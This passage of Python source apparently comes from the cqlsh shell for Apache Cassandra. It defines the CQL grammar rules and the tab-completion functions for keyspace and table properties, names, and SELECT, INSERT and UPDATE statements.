        'EACH_QUORUM',
        'SERIAL'
    )
    # Extra sub-option names per compaction strategy class.
    size_tiered_compaction_strategy_options = (
        'min_sstable_size',
        'min_threshold',
        'bucket_high',
        'bucket_low'
    )
    leveled_compaction_strategy_options = (
        'sstable_size_in_mb',
        'fanout_size'
    )
    date_tiered_compaction_strategy_options = (
        'base_time_seconds',
        'max_sstable_age_days',
        'min_threshold',
        'max_window_size_seconds',
        'timestamp_resolution'
    )
    time_window_compaction_strategy_options = (
        'compaction_window_unit',
        'compaction_window_size',
        'min_threshold',
        'timestamp_resolution'
    )
    @classmethod
    def escape_value(cls, value):
        """Render a Python value as a CQL literal (quoted unless numeric)."""
        if value is None:
            return 'NULL' # this totally won't work
        # bool must be tested before the numeric branches (bool is an int
        # subclass); it falls through to the quoted-string return below.
        if isinstance(value, bool):
            value = str(value).lower()
        elif isinstance(value, float):
            return '%f' % value
        elif isinstance(value, int):
            return str(value)
        return "'%s'" % value.replace("'", "''")
    @classmethod
    def escape_name(cls, name):
        """Single-quote a name, doubling any embedded single quotes."""
        if name is None:
            return 'NULL'
        return "'%s'" % name.replace("'", "''")
    @staticmethod
    def dequote_name(name):
        """Strip double quotes from an identifier; unquoted names lowercase."""
        name = name.strip()
        if name == '':
            return name
        if name[0] == '"' and name[-1] == '"':
            return name[1:-1].replace('""', '"')
        else:
            return name.lower()
    @staticmethod
    def dequote_value(cqlword):
        """Strip single quotes from a string literal, un-doubling ''."""
        cqlword = cqlword.strip()
        if cqlword == '':
            return cqlword
        if cqlword[0] == "'" and cqlword[-1] == "'":
            cqlword = cqlword[1:-1].replace("''", "'")
        return cqlword
# Module-level singleton rule set used by every completer below.
CqlRuleSet = Cql3ParsingRuleSet()
# convenience for remainder of module
completer_for = CqlRuleSet.completer_for
explain_completion = CqlRuleSet.explain_completion
dequote_value = CqlRuleSet.dequote_value
dequote_name = CqlRuleSet.dequote_name
escape_value = CqlRuleSet.escape_value
# BEGIN SYNTAX/COMPLETION RULE DEFINITIONS
syntax_rules = r'''
<Start> ::= <CQL_Statement>*
;
<CQL_Statement> ::= [statements]=<statementBody> ";"
;
# the order of these terminal productions is significant:
<endline> ::= /\n/ ;
JUNK ::= /([ \t\r\f\v]+|(--|[/][/])[^\n\r]*([\n\r]|$)|[/][*].*?[*][/])/ ;
<stringLiteral> ::= <quotedStringLiteral>
| <pgStringLiteral> ;
<quotedStringLiteral> ::= /'([^']|'')*'/ ;
<pgStringLiteral> ::= /\$\$(?:(?!\$\$).)*\$\$/;
<quotedName> ::= /"([^"]|"")*"/ ;
<float> ::= /-?[0-9]+\.[0-9]+/ ;
<uuid> ::= /[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/ ;
<blobLiteral> ::= /0x[0-9a-f]+/ ;
<wholenumber> ::= /[0-9]+/ ;
<identifier> ::= /[a-z][a-z0-9_]*/ ;
<colon> ::= ":" ;
<star> ::= "*" ;
<endtoken> ::= ";" ;
<op> ::= /[-+=%/,().]/ ;
<cmp> ::= /[<>!]=?/ ;
<brackets> ::= /[][{}]/ ;
<integer> ::= "-"? <wholenumber> ;
<boolean> ::= "true"
| "false"
;
<unclosedPgString>::= /\$\$(?:(?!\$\$).)*/ ;
<unclosedString> ::= /'([^']|'')*/ ;
<unclosedName> ::= /"([^"]|"")*/ ;
<unclosedComment> ::= /[/][*].*$/ ;
<term> ::= <stringLiteral>
| <integer>
| <float>
| <uuid>
| <boolean>
| <blobLiteral>
| <collectionLiteral>
| <functionLiteral> <functionArguments>
| "NULL"
;
<functionLiteral> ::= (<identifier> ( "." <identifier> )?)
| "TOKEN"
;
<functionArguments> ::= "(" ( <term> ( "," <term> )* )? ")"
;
<tokenDefinition> ::= token="TOKEN" "(" <term> ( "," <term> )* ")"
| <term>
;
<cident> ::= <quotedName>
| <identifier>
| <unreservedKeyword>
;
<colname> ::= <cident> ; # just an alias
<collectionLiteral> ::= <listLiteral>
| <setLiteral>
| <mapLiteral>
;
<listLiteral> ::= "[" ( <term> ( "," <term> )* )? "]"
;
<setLiteral> ::= "{" ( <term> ( "," <term> )* )? "}"
;
<mapLiteral> ::= "{" <term> ":" <term> ( "," <term> ":" <term> )* "}"
;
<anyFunctionName> ::= ( ksname=<cfOrKsName> dot="." )? udfname=<cfOrKsName> ;
<userFunctionName> ::= ( ksname=<nonSystemKeyspaceName> dot="." )? udfname=<cfOrKsName> ;
<refUserFunctionName> ::= udfname=<cfOrKsName> ;
<userAggregateName> ::= ( ksname=<nonSystemKeyspaceName> dot="." )? udaname=<cfOrKsName> ;
<functionAggregateName> ::= ( ksname=<nonSystemKeyspaceName> dot="." )? functionname=<cfOrKsName> ;
<aggregateName> ::= <userAggregateName>
;
<functionName> ::= <functionAggregateName>
| "TOKEN"
;
<statementBody> ::= <useStatement>
| <selectStatement>
| <dataChangeStatement>
| <schemaChangeStatement>
| <authenticationStatement>
| <authorizationStatement>
;
<dataChangeStatement> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
| <truncateStatement>
| <batchStatement>
;
<schemaChangeStatement> ::= <createKeyspaceStatement>
| <createColumnFamilyStatement>
| <createIndexStatement>
| <createMaterializedViewStatement>
| <createUserTypeStatement>
| <createFunctionStatement>
| <createAggregateStatement>
| <createTriggerStatement>
| <dropKeyspaceStatement>
| <dropColumnFamilyStatement>
| <dropIndexStatement>
| <dropMaterializedViewStatement>
| <dropUserTypeStatement>
| <dropFunctionStatement>
| <dropAggregateStatement>
| <dropTriggerStatement>
| <alterTableStatement>
| <alterKeyspaceStatement>
| <alterUserTypeStatement>
;
<authenticationStatement> ::= <createUserStatement>
| <alterUserStatement>
| <dropUserStatement>
| <listUsersStatement>
| <createRoleStatement>
| <alterRoleStatement>
| <dropRoleStatement>
| <listRolesStatement>
;
<authorizationStatement> ::= <grantStatement>
| <grantRoleStatement>
| <revokeStatement>
| <revokeRoleStatement>
| <listPermissionsStatement>
;
# timestamp is included here, since it's also a keyword
<simpleStorageType> ::= typename=( <identifier> | <stringLiteral> | "timestamp" ) ;
<userType> ::= utname=<cfOrKsName> ;
<storageType> ::= <simpleStorageType> | <collectionType> | <frozenCollectionType> | <userType> ;
# Note: autocomplete for frozen collection types does not handle nesting past depth 1 properly,
# but that's a lot of work to fix for little benefit.
<collectionType> ::= "map" "<" <simpleStorageType> "," ( <simpleStorageType> | <userType> ) ">"
| "list" "<" ( <simpleStorageType> | <userType> ) ">"
| "set" "<" ( <simpleStorageType> | <userType> ) ">"
;
<frozenCollectionType> ::= "frozen" "<" "map" "<" <storageType> "," <storageType> ">" ">"
| "frozen" "<" "list" "<" <storageType> ">" ">"
| "frozen" "<" "set" "<" <storageType> ">" ">"
;
<columnFamilyName> ::= ( ksname=<cfOrKsName> dot="." )? cfname=<cfOrKsName> ;
<materializedViewName> ::= ( ksname=<cfOrKsName> dot="." )? mvname=<cfOrKsName> ;
<userTypeName> ::= ( ksname=<cfOrKsName> dot="." )? utname=<cfOrKsName> ;
<keyspaceName> ::= ksname=<cfOrKsName> ;
<nonSystemKeyspaceName> ::= ksname=<cfOrKsName> ;
<alterableKeyspaceName> ::= ksname=<cfOrKsName> ;
<cfOrKsName> ::= <identifier>
| <quotedName>
| <unreservedKeyword>;
<unreservedKeyword> ::= nocomplete=
( "key"
| "clustering"
# | "count" -- to get count(*) completion, treat count as reserved
| "ttl"
| "compact"
| "storage"
| "type"
| "values" )
;
<property> ::= [propname]=<cident> propeq="=" [propval]=<propertyValue>
;
<propertyValue> ::= propsimpleval=( <stringLiteral>
| <identifier>
| <integer>
| <float>
| <unreservedKeyword> )
# we don't use <mapLiteral> here so we can get more targeted
# completions:
| propsimpleval="{" [propmapkey]=<term> ":" [propmapval]=<term>
( ender="," [propmapkey]=<term> ":" [propmapval]=<term> )*
ender="}"
;
'''
def prop_equals_completer(ctxt, cass):
    """Offer '=' after a property name, except for bare table keywords."""
    if not working_on_keyspace(ctxt):
        # we know if the thing in the property name position is "compact" or
        # "clustering" that there won't actually be an equals sign, because
        # there are no properties by those names. there are, on the other hand,
        # table properties that start with those keywords which don't have
        # equals signs at all.
        curprop = ctxt.get_binding('propname')[-1].upper()
        if curprop in ('COMPACT', 'CLUSTERING'):
            return ()
    return ['=']
completer_for('property', 'propeq')(prop_equals_completer)
@completer_for('property', 'propname')
def prop_name_completer(ctxt, cass):
    """Dispatch property-name completion to the keyspace or table variant."""
    if working_on_keyspace(ctxt):
        return ks_prop_name_completer(ctxt, cass)
    else:
        return cf_prop_name_completer(ctxt, cass)
@completer_for('propertyValue', 'propsimpleval')
def prop_val_completer(ctxt, cass):
    """Dispatch property-value completion to the keyspace or table variant."""
    if working_on_keyspace(ctxt):
        return ks_prop_val_completer(ctxt, cass)
    else:
        return cf_prop_val_completer(ctxt, cass)
@completer_for('propertyValue', 'propmapkey')
def prop_val_mapkey_completer(ctxt, cass):
    """Dispatch map-key completion to the keyspace or table variant."""
    if working_on_keyspace(ctxt):
        return ks_prop_val_mapkey_completer(ctxt, cass)
    else:
        return cf_prop_val_mapkey_completer(ctxt, cass)
@completer_for('propertyValue', 'propmapval')
def prop_val_mapval_completer(ctxt, cass):
    """Dispatch map-value completion to the keyspace or table variant."""
    if working_on_keyspace(ctxt):
        return ks_prop_val_mapval_completer(ctxt, cass)
    else:
        return cf_prop_val_mapval_completer(ctxt, cass)
@completer_for('propertyValue', 'ender')
def prop_val_mapender_completer(ctxt, cass):
    """Dispatch map-terminator completion to the keyspace or table variant."""
    if working_on_keyspace(ctxt):
        return ks_prop_val_mapender_completer(ctxt, cass)
    else:
        return cf_prop_val_mapender_completer(ctxt, cass)
def ks_prop_name_completer(ctxt, cass):
    """Suggest the next keyspace property name ('replication' comes first)."""
    seen = ctxt.get_binding('propname', ())
    return ["durable_writes"] if 'replication' in seen else ['replication']
def ks_prop_val_completer(ctxt, cass):
    """Suggest a starter value for the keyspace property being assigned."""
    last_opt = ctxt.get_binding('propname')[-1]
    if last_opt == 'replication':
        return ["{'class': '"]
    if last_opt == 'durable_writes':
        return ["'true'", "'false'"]
    return ()
def ks_prop_val_mapkey_completer(ctxt, cass):
    """Suggest keys for the keyspace 'replication' map option.

    Returns "'class'" until a strategy class is chosen, then the remaining
    sub-option keys for that strategy (or a <dc_name> hint for NTS).
    """
    optname = ctxt.get_binding('propname')[-1]
    if optname != 'replication':
        return ()
    # Materialize as lists so the bindings can be scanned more than once.
    keysseen = list(map(dequote_value, ctxt.get_binding('propmapkey', ())))
    valsseen = list(map(dequote_value, ctxt.get_binding('propmapval', ())))
    for k, v in zip(keysseen, valsseen):
        if k == 'class':
            repclass = v
            break
    else:
        # No strategy class typed yet; it must come first.
        return ["'class'"]
    if repclass in CqlRuleSet.replication_factor_strategies:
        opts = set(('replication_factor',))
    elif repclass == 'NetworkTopologyStrategy':
        return [Hint('<dc_name>')]
    else:
        # BUGFIX: an unrecognized strategy class previously fell through to
        # the return below with 'opts' unbound, raising NameError.
        return ()
    return map(escape_value, opts.difference(keysseen))
def ks_prop_val_mapval_completer(ctxt, cass):
    """Suggest values for a key inside the keyspace 'replication' map."""
    if ctxt.get_binding('propname')[-1] != 'replication':
        return ()
    last_key = dequote_value(ctxt.get_binding('propmapkey')[-1])
    if last_key == 'class':
        return map(escape_value, CqlRuleSet.replication_strategies)
    return [Hint('<term>')]
def ks_prop_val_mapender_completer(ctxt, cass):
    """Decide whether ',' or '}' should follow a replication-map entry."""
    if ctxt.get_binding('propname')[-1] != 'replication':
        return [',']
    keys = [dequote_value(k) for k in ctxt.get_binding('propmapkey', ())]
    vals = [dequote_value(v) for v in ctxt.get_binding('propmapval', ())]
    strategy = None
    for key, val in zip(keys, vals):
        if key == 'class':
            strategy = val
            break
    if strategy is None:
        # The strategy class is still missing, so the map cannot close yet.
        return [',']
    if strategy in CqlRuleSet.replication_factor_strategies and 'replication_factor' not in keys:
        return [',']
    if strategy == 'NetworkTopologyStrategy' and len(keys) == 1:
        return [',']
    return ['}']
def cf_prop_name_completer(ctxt, cass):
    """List every known table (column family) property name."""
    all_options = (CqlRuleSet.columnfamily_layout_options +
                   CqlRuleSet.columnfamily_layout_map_options)
    return [option[0] for option in all_options]
def cf_prop_val_completer(ctxt, cass):
    """Suggest a starter value or hint for the table property being set."""
    exist_opts = ctxt.get_binding('propname')
    this_opt = exist_opts[-1]
    # Map-valued options open with their most significant key.
    if this_opt == 'compression':
        return ["{'sstable_compression': '"]
    if this_opt == 'compaction':
        return ["{'class': '"]
    if this_opt == 'caching':
        return ["{'keys': '"]
    if any(this_opt == opt[0] for opt in CqlRuleSet.obsolete_cf_options):
        return ["'<obsolete_option>'"]
    if this_opt in ('read_repair_chance', 'bloom_filter_fp_chance',
                    'dclocal_read_repair_chance'):
        return [Hint('<float_between_0_and_1>')]
    if this_opt in ('min_compaction_threshold', 'max_compaction_threshold',
                    'gc_grace_seconds', 'min_index_interval', 'max_index_interval'):
        return [Hint('<integer>')]
    # BUGFIX: was `this_opt in ('cdc')`, a substring test on the string 'cdc'
    # (which also matched 'c', 'd', 'cd' and 'dc'), not a tuple membership.
    if this_opt == 'cdc':
        return [Hint('<true|false>')]
    return [Hint('<option_value>')]
def cf_prop_val_mapkey_completer(ctxt, cass):
    """Suggest remaining sub-option keys for a map-valued table property.

    For 'compaction', the key set grows with strategy-specific options once
    the 'class' key has been supplied.
    """
    optname = ctxt.get_binding('propname')[-1]
    # Locate the known sub-option names for this map property.
    for cql3option, _, subopts in CqlRuleSet.columnfamily_layout_map_options:
        if optname == cql3option:
            break
    else:
        return ()
    # NOTE(review): Python 2 map() returns lists, which keysseen relies on
    # below (set difference after being consumed by zip).
    keysseen = map(dequote_value, ctxt.get_binding('propmapkey', ()))
    valsseen = map(dequote_value, ctxt.get_binding('propmapval', ()))
    pairsseen = dict(zip(keysseen, valsseen))
    if optname == 'compression':
        return map(escape_value, set(subopts).difference(keysseen))
    if optname == 'caching':
        return map(escape_value, set(subopts).difference(keysseen))
    if optname == 'compaction':
        opts = set(subopts)
        try:
            csc = pairsseen['class']
        except KeyError:
            # No strategy chosen yet; 'class' must come first.
            return ["'class'"]
        # Only the class's final path component selects the option set.
        csc = csc.split('.')[-1]
        if csc == 'SizeTieredCompactionStrategy':
            opts = opts.union(set(CqlRuleSet.size_tiered_compaction_strategy_options))
        elif csc == 'LeveledCompactionStrategy':
            opts = opts.union(set(CqlRuleSet.leveled_compaction_strategy_options))
        elif csc == 'DateTieredCompactionStrategy':
            opts = opts.union(set(CqlRuleSet.date_tiered_compaction_strategy_options))
        elif csc == 'TimeWindowCompactionStrategy':
            opts = opts.union(set(CqlRuleSet.time_window_compaction_strategy_options))
        return map(escape_value, opts)
    return ()
def cf_prop_val_mapval_completer(ctxt, cass):
    """Suggest values for a sub-option key of a map-valued table property."""
    prop = ctxt.get_binding('propname')[-1]
    subkey = dequote_value(ctxt.get_binding('propmapkey')[-1])
    if prop == 'compaction':
        if subkey == 'class':
            return map(escape_value, CqlRuleSet.available_compaction_classes)
        return [Hint('<option_value>')]
    if prop == 'compression':
        if subkey == 'sstable_compression':
            return map(escape_value, CqlRuleSet.available_compression_classes)
        return [Hint('<option_value>')]
    if prop == 'caching':
        if subkey == 'rows_per_partition':
            return ["'ALL'", "'NONE'", Hint('#rows_per_partition')]
        if subkey == 'keys':
            return ["'ALL'", "'NONE'"]
    return ()
def cf_prop_val_mapender_completer(ctxt, cass):
    """A table-property map entry may continue (',') or close ('}')."""
    return [',', '}']
@completer_for('tokenDefinition', 'token')
def token_word_completer(ctxt, cass):
    """Complete the TOKEN( opener in a token definition."""
    return ['token(']
@completer_for('simpleStorageType', 'typename')
def storagetype_completer(ctxt, cass):
    """Offer every native scalar CQL type name."""
    return simple_cql_types
@completer_for('keyspaceName', 'ksname')
def ks_name_completer(ctxt, cass):
    """Offer all keyspace names, escaped as needed."""
    return map(maybe_escape_name, cass.get_keyspace_names())
@completer_for('nonSystemKeyspaceName', 'ksname')
def non_system_ks_name_completer(ctxt, cass):
    """Offer keyspace names, excluding Cassandra's own system keyspaces."""
    ksnames = [n for n in cass.get_keyspace_names() if n not in SYSTEM_KEYSPACES]
    return map(maybe_escape_name, ksnames)
@completer_for('alterableKeyspaceName', 'ksname')
def alterable_ks_name_completer(ctxt, cass):
    """Offer keyspace names that are allowed to be ALTERed."""
    ksnames = [n for n in cass.get_keyspace_names() if n not in NONALTERBALE_KEYSPACES]
    return map(maybe_escape_name, ksnames)
def cf_ks_name_completer(ctxt, cass):
    """Offer keyspace names with a trailing dot, as a table-name prefix."""
    return [maybe_escape_name(ks) + '.' for ks in cass.get_keyspace_names()]
completer_for('columnFamilyName', 'ksname')(cf_ks_name_completer)
completer_for('materializedViewName', 'ksname')(cf_ks_name_completer)
def cf_ks_dot_completer(ctxt, cass):
    """Offer '.' only when the bound name really is a known keyspace."""
    name = dequote_name(ctxt.get_binding('ksname'))
    if name in cass.get_keyspace_names():
        return ['.']
    return []
completer_for('columnFamilyName', 'dot')(cf_ks_dot_completer)
completer_for('materializedViewName', 'dot')(cf_ks_dot_completer)
@completer_for('columnFamilyName', 'cfname')
def cf_name_completer(ctxt, cass):
    """Offer table names in the bound keyspace (or the current one)."""
    ks = ctxt.get_binding('ksname', None)
    if ks is not None:
        ks = dequote_name(ks)
    try:
        cfnames = cass.get_columnfamily_names(ks)
    except Exception:
        # With no explicit keyspace there may be no current one either;
        # offer nothing rather than fail the completion.
        if ks is None:
            return ()
        raise
    return map(maybe_escape_name, cfnames)
@completer_for('materializedViewName', 'mvname')
def mv_name_completer(ctxt, cass):
    """Offer materialized view names in the bound (or current) keyspace."""
    ks = ctxt.get_binding('ksname', None)
    if ks is not None:
        ks = dequote_name(ks)
    try:
        mvnames = cass.get_materialized_view_names(ks)
    except Exception:
        if ks is None:
            return ()
        raise
    return map(maybe_escape_name, mvnames)
completer_for('userTypeName', 'ksname')(cf_ks_name_completer)
completer_for('userTypeName', 'dot')(cf_ks_dot_completer)
def ut_name_completer(ctxt, cass):
    """Offer user-defined type names in the bound (or current) keyspace."""
    ks = ctxt.get_binding('ksname', None)
    if ks is not None:
        ks = dequote_name(ks)
    try:
        utnames = cass.get_usertype_names(ks)
    except Exception:
        if ks is None:
            return ()
        raise
    return map(maybe_escape_name, utnames)
completer_for('userTypeName', 'utname')(ut_name_completer)
completer_for('userType', 'utname')(ut_name_completer)
@completer_for('unreservedKeyword', 'nocomplete')
def unreserved_keyword_completer(ctxt, cass):
    # we never want to provide completions through this production;
    # this is always just to allow use of some keywords as column
    # names, CF names, property values, etc.
    return ()
def get_table_meta(ctxt, cass):
    """Fetch table metadata for the ksname/cfname bound in the context."""
    keyspace = ctxt.get_binding('ksname', None)
    if keyspace is not None:
        keyspace = dequote_name(keyspace)
    table = dequote_name(ctxt.get_binding('cfname'))
    return cass.get_table_meta(keyspace, table)

def get_ut_layout(ctxt, cass):
    """Fetch the field layout of the user type bound in the context."""
    keyspace = ctxt.get_binding('ksname', None)
    if keyspace is not None:
        keyspace = dequote_name(keyspace)
    typename = dequote_name(ctxt.get_binding('utname'))
    return cass.get_usertype_layout(keyspace, typename)
def working_on_keyspace(ctxt):
    """True when the statement being completed targets a keyspace/schema."""
    return ctxt.get_binding('wat').upper() in ('KEYSPACE', 'SCHEMA')
syntax_rules += r'''
<useStatement> ::= "USE" <keyspaceName>
;
<selectStatement> ::= "SELECT" ( "JSON" )? <selectClause>
"FROM" (cf=<columnFamilyName> | mv=<materializedViewName>)
( "WHERE" <whereClause> )?
( "GROUP" "BY" <groupByClause> ( "," <groupByClause> )* )?
( "ORDER" "BY" <orderByClause> ( "," <orderByClause> )* )?
( "PER" "PARTITION" "LIMIT" perPartitionLimit=<wholenumber> )?
( "LIMIT" limit=<wholenumber> )?
( "ALLOW" "FILTERING" )?
;
<whereClause> ::= <relation> ( "AND" <relation> )*
;
<relation> ::= [rel_lhs]=<cident> ( "[" <term> "]" )? ( "=" | "<" | ">" | "<=" | ">=" | "CONTAINS" ( "KEY" )? ) <term>
| token="TOKEN" "(" [rel_tokname]=<cident>
( "," [rel_tokname]=<cident> )*
")" ("=" | "<" | ">" | "<=" | ">=") <tokenDefinition>
| [rel_lhs]=<cident> "IN" "(" <term> ( "," <term> )* ")"
;
<selectClause> ::= "DISTINCT"? <selector> ("AS" <cident>)? ("," <selector> ("AS" <cident>)?)*
| "*"
;
<udtSubfieldSelection> ::= <identifier> "." <identifier>
;
<selector> ::= [colname]=<cident>
| <udtSubfieldSelection>
| "WRITETIME" "(" [colname]=<cident> ")"
| "TTL" "(" [colname]=<cident> ")"
| "COUNT" "(" star=( "*" | "1" ) ")"
| "CAST" "(" <selector> "AS" <storageType> ")"
| <functionName> <selectionFunctionArguments>
| <term>
;
<selectionFunctionArguments> ::= "(" ( <selector> ( "," <selector> )* )? ")"
;
<orderByClause> ::= [ordercol]=<cident> ( "ASC" | "DESC" )?
;
<groupByClause> ::= [groupcol]=<cident>
;
'''
def udf_name_completer(ctxt, cass):
    """Offer user-defined function names in the bound (or current) keyspace."""
    ks = ctxt.get_binding('ksname', None)
    if ks is not None:
        ks = dequote_name(ks)
    try:
        udfnames = cass.get_userfunction_names(ks)
    except Exception:
        # With no explicit keyspace there may be no current one; offer nothing.
        if ks is None:
            return ()
        raise
    return map(maybe_escape_name, udfnames)
def uda_name_completer(ctxt, cass):
    """Offer user-defined aggregate names in the bound (or current) keyspace."""
    ks = ctxt.get_binding('ksname', None)
    if ks is not None:
        ks = dequote_name(ks)
    try:
        udanames = cass.get_useraggregate_names(ks)
    except Exception:
        if ks is None:
            return ()
        raise
    return map(maybe_escape_name, udanames)
def udf_uda_name_completer(ctxt, cass):
    """Offer both UDF and UDA names in the bound (or current) keyspace."""
    ks = ctxt.get_binding('ksname', None)
    if ks is not None:
        ks = dequote_name(ks)
    try:
        functionnames = cass.get_userfunction_names(ks) + cass.get_useraggregate_names(ks)
    except Exception:
        if ks is None:
            return ()
        raise
    return map(maybe_escape_name, functionnames)
def ref_udf_name_completer(ctxt, cass):
    """Offer UDF names from the current keyspace; best-effort only."""
    try:
        udanames = cass.get_userfunction_names(None)
    except Exception:
        return ()
    return map(maybe_escape_name, udanames)
# Wire the name completers above into the grammar bindings they serve.
completer_for('functionAggregateName', 'ksname')(cf_ks_name_completer)
completer_for('functionAggregateName', 'dot')(cf_ks_dot_completer)
completer_for('functionAggregateName', 'functionname')(udf_uda_name_completer)
completer_for('anyFunctionName', 'ksname')(cf_ks_name_completer)
completer_for('anyFunctionName', 'dot')(cf_ks_dot_completer)
completer_for('anyFunctionName', 'udfname')(udf_name_completer)
completer_for('userFunctionName', 'ksname')(cf_ks_name_completer)
completer_for('userFunctionName', 'dot')(cf_ks_dot_completer)
completer_for('userFunctionName', 'udfname')(udf_name_completer)
completer_for('refUserFunctionName', 'udfname')(ref_udf_name_completer)
completer_for('userAggregateName', 'ksname')(cf_ks_name_completer)
completer_for('userAggregateName', 'dot')(cf_ks_dot_completer)
completer_for('userAggregateName', 'udaname')(uda_name_completer)
@completer_for('orderByClause', 'ordercol')
def select_order_column_completer(ctxt, cass):
    """Offer the next clustering column eligible for ORDER BY."""
    prev_order_cols = ctxt.get_binding('ordercol', ())
    keyname = ctxt.get_binding('keyname')
    if keyname is None:
        keyname = ctxt.get_binding('rel_lhs', ())
        if not keyname:
            return [Hint("Can't ORDER BY here: need to specify partition key in WHERE clause")]
    layout = get_table_meta(ctxt, cass)
    order_by_candidates = [col.name for col in layout.clustering_key]
    # Clustering columns must be ordered in declaration order; offer the next.
    if len(order_by_candidates) > len(prev_order_cols):
        return [maybe_escape_name(order_by_candidates[len(prev_order_cols)])]
    return [Hint('No more orderable columns here.')]
@completer_for('groupByClause', 'groupcol')
def select_group_column_completer(ctxt, cass):
    """Offer the next primary-key column eligible for GROUP BY."""
    prev_group_cols = ctxt.get_binding('groupcol', ())
    layout = get_table_meta(ctxt, cass)
    group_by_candidates = [col.name for col in layout.primary_key]
    if len(group_by_candidates) > len(prev_group_cols):
        return [maybe_escape_name(group_by_candidates[len(prev_group_cols)])]
    return [Hint('No more columns here.')]
@completer_for('relation', 'token')
def relation_token_word_completer(ctxt, cass):
    """Complete the TOKEN( opener in a WHERE relation."""
    return ['TOKEN(']
@completer_for('relation', 'rel_tokname')
def relation_token_subject_completer(ctxt, cass):
    """Offer partition-key column names as TOKEN() arguments."""
    layout = get_table_meta(ctxt, cass)
    return [key.name for key in layout.partition_key]
@completer_for('relation', 'rel_lhs')
def select_relation_lhs_completer(ctxt, cass):
    """Offer columns that can legally appear on a WHERE clause's left side.

    Key columns become filterable in declaration order once their
    predecessors are already filtered on; indexed columns are always offered.
    """
    layout = get_table_meta(ctxt, cass)
    filterable = set()
    already_filtered_on = map(dequote_name, ctxt.get_binding('rel_lhs', ()))
    for num in range(0, len(layout.partition_key)):
        if num == 0 or layout.partition_key[num - 1].name in already_filtered_on:
            filterable.add(layout.partition_key[num].name)
        else:
            break
    for num in range(0, len(layout.clustering_key)):
        if num == 0 or layout.clustering_key[num - 1].name in already_filtered_on:
            filterable.add(layout.clustering_key[num].name)
        else:
            break
    # NOTE(review): itervalues() is Python 2 only.
    for idx in layout.indexes.itervalues():
        filterable.add(idx.index_options["target"])
    return map(maybe_escape_name, filterable)
explain_completion('selector', 'colname')
syntax_rules += r'''
<insertStatement> ::= "INSERT" "INTO" cf=<columnFamilyName>
( ( "(" [colname]=<cident> ( "," [colname]=<cident> )* ")"
"VALUES" "(" [newval]=<term> ( valcomma="," [newval]=<term> )* valcomma=")")
| ("JSON" <stringLiteral>))
( "IF" "NOT" "EXISTS")?
( "USING" [insertopt]=<usingOption>
( "AND" [insertopt]=<usingOption> )* )?
;
<usingOption> ::= "TIMESTAMP" <wholenumber>
| "TTL" <wholenumber>
;
'''
def regular_column_names(table_meta):
    """Return the table's non-primary-key column names as a list.

    Returns an empty list when *table_meta* is missing or has no columns.
    """
    if not table_meta or not table_meta.columns:
        return []
    primary = set(k.name for k in table_meta.partition_key)
    primary.update(k.name for k in table_meta.clustering_key)
    return list(set(table_meta.columns.keys()) - primary)
@completer_for('insertStatement', 'colname')
def insert_colname_completer(ctxt, cass):
    """Complete the INSERT column list: key columns first, then the rest."""
    layout = get_table_meta(ctxt, cass)
    already_given = set(dequote_name(n) for n in ctxt.get_binding('colname', ()))
    # Suggest primary-key columns one at a time until all are present.
    for key_col in layout.primary_key:
        if key_col.name not in already_given:
            return [maybe_escape_name(key_col.name)]
    remaining = set(regular_column_names(layout)) - already_given
    return map(maybe_escape_name, remaining)
@completer_for('insertStatement', 'newval')
def insert_newval_completer(ctxt, cass):
    """Suggest an opener or a hint for the next value in a VALUES list."""
    layout = get_table_meta(ctxt, cass)
    listed_cols = [dequote_name(n) for n in ctxt.get_binding('colname')]
    values_so_far = ctxt.get_binding('newval', ())
    if len(values_so_far) >= len(listed_cols):
        # Every listed column already has a value.
        return []
    current = listed_cols[len(values_so_far)]
    current_type = layout.columns[current].cql_type
    if current_type in ('map', 'set'):
        return ['{']
    elif current_type == 'list':
        return ['[']
    elif current_type == 'boolean':
        return ['true', 'false']
    return [Hint('<value for %s (%s)>' % (maybe_escape_name(current),
                                          current_type))]
@completer_for('insertStatement', 'valcomma')
def insert_valcomma_completer(ctxt, cass):
    """After a value, offer ',' while columns remain, else the closing ')'."""
    remaining = (len(ctxt.get_binding('colname', ()))
                 - len(ctxt.get_binding('newval', ())))
    return [','] if remaining > 0 else [')']
@completer_for('insertStatement', 'insertopt')
def insert_option_completer(ctxt, cass):
    """Offer the USING options (TIMESTAMP/TTL) not already present."""
    remaining = set(['TIMESTAMP', 'TTL'])
    for used in ctxt.get_binding('insertopt', ()):
        remaining.discard(used.split()[0])
    return remaining
syntax_rules += r'''
<updateStatement> ::= "UPDATE" cf=<columnFamilyName>
( "USING" [updateopt]=<usingOption>
( "AND" [updateopt]=<usingOption> )* )?
"SET" <assignment> ( "," <assignment> )*
"WHERE" <whereClause>
( "IF" ( "EXISTS" | <conditions> ))?
;
<assignment> ::= updatecol=<cident>
(( "=" update_rhs=( <term> | <cident> )
( counterop=( "+" | "-" ) inc=<wholenumber>
| listadder="+" listcol=<cident> )? )
| ( indexbracket="[" <term> "]" "=" <term> )
| ( udt_field_dot="." udt_field=<identifier> "=" <term> ))
;
<conditions> ::= <condition> ( "AND" <condition> )*
;
<condition_op_and_rhs> ::= (("=" | "<" | ">" | "<=" | ">=" | "!=") <term>)
| ("IN" "(" <term> ( "," <term> )* ")" )
;
<condition> ::= conditioncol=<cident>
( (( indexbracket="[" <term> "]" )
|( udt_field_dot="." udt_field=<identifier> )) )?
<condition_op_and_rhs>
;
'''
@completer_for('updateStatement', 'updateopt')
def update_option_completer(ctxt, cass):
    """Offer the USING options (TIMESTAMP/TTL) not already present."""
    remaining = set(['TIMESTAMP', 'TTL'])
    for used in ctxt.get_binding('updateopt', ()):
        remaining.discard(used.split()[0])
    return remaining
@completer_for('assignment', 'updatecol')
def update_col_completer(ctxt, cass):
    """Complete the SET column: any non-primary-key column of the table."""
    table_meta = get_table_meta(ctxt, cass)
    return [maybe_escape_name(c) for c in regular_column_names(table_meta)]
@completer_for('assignment', 'update_rhs')
def update_countername_completer(ctxt, cass):
    """Suggest the SET right-hand side according to the column's type."""
    layout = get_table_meta(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('updatecol', ''))
    cql_type = layout.columns[colname].cql_type
    if cql_type == 'counter':
        # Counters can only be updated as "col = col + n".
        return [maybe_escape_name(colname)]
    elif cql_type in ('map', 'set'):
        return ["{"]
    elif cql_type == 'list':
        return ["["]
    return [Hint('<term (%s)>' % cql_type)]
@completer_for('assignment', 'counterop')
def update_counterop_completer(ctxt, cass):
